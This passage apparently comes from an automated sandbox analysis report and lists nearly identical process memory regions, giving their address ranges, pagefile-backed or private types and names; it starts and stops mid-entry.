pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 870 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 871 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 872 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 873 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 874 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 875 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 876 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 877 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 878 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 879 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 880 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 881 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 882 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 883 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 884 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 885 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 886 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 887 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 888 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 889 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 890 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 891 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 892 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 893 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 894 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 895 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 896 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 897 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 898 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 899 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 900 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 901 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 902 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 903 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 904 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 905 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 906 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 907 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 908 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 909 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 910 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 911 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 912 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 913 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 914 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 915 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 916 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 917 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 918 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 919 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 920 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 921 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 922 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 923 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 924 start_va = 0x3950000 end_va = 0x3961fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 925 start_va = 0x3970000 end_va = 0x397dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 926 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 927 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 928 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 929 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 930 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 931 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 932 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 933 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 934 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 935 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 936 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 937 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 938 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 939 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 940 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 941 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 942 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 943 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 944 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 945 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 946 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 947 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 948 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 949 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 950 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 951 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 952 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 953 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 954 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 955 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 956 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 957 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 958 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 959 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 960 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 961 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 962 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 963 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 964 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 965 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 966 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 967 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 968 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 969 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 970 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 971 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 972 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 973 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 974 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 975 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 976 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 977 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 978 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 979 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 980 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 981 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 982 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 983 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 984 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 985 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 986 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 987 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 988 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 989 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 990 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 991 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 992 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 993 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 994 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 995 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 996 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 997 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 998 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 999 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1000 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1001 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1002 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1003 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1004 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1005 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1006 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1007 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1008 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1009 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1010 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1011 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1012 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1013 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1014 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1015 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1016 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1017 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1018 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1019 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1020 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1021 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1022 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1023 start_va = 0x3950000 end_va = 0x3961fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1024 start_va = 0x3970000 end_va = 0x397dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 1025 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1026 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1027 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1028 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1029 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1030 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1031 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1032 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1033 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1034 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1035 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1036 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1037 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1038 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1039 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1040 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1041 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1042 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1043 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1044 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1045 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1046 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1047 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1048 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1049 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1050 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1051 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1052 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1053 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1054 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1055 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 1056 start_va = 0x3950000 end_va = 0x395dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 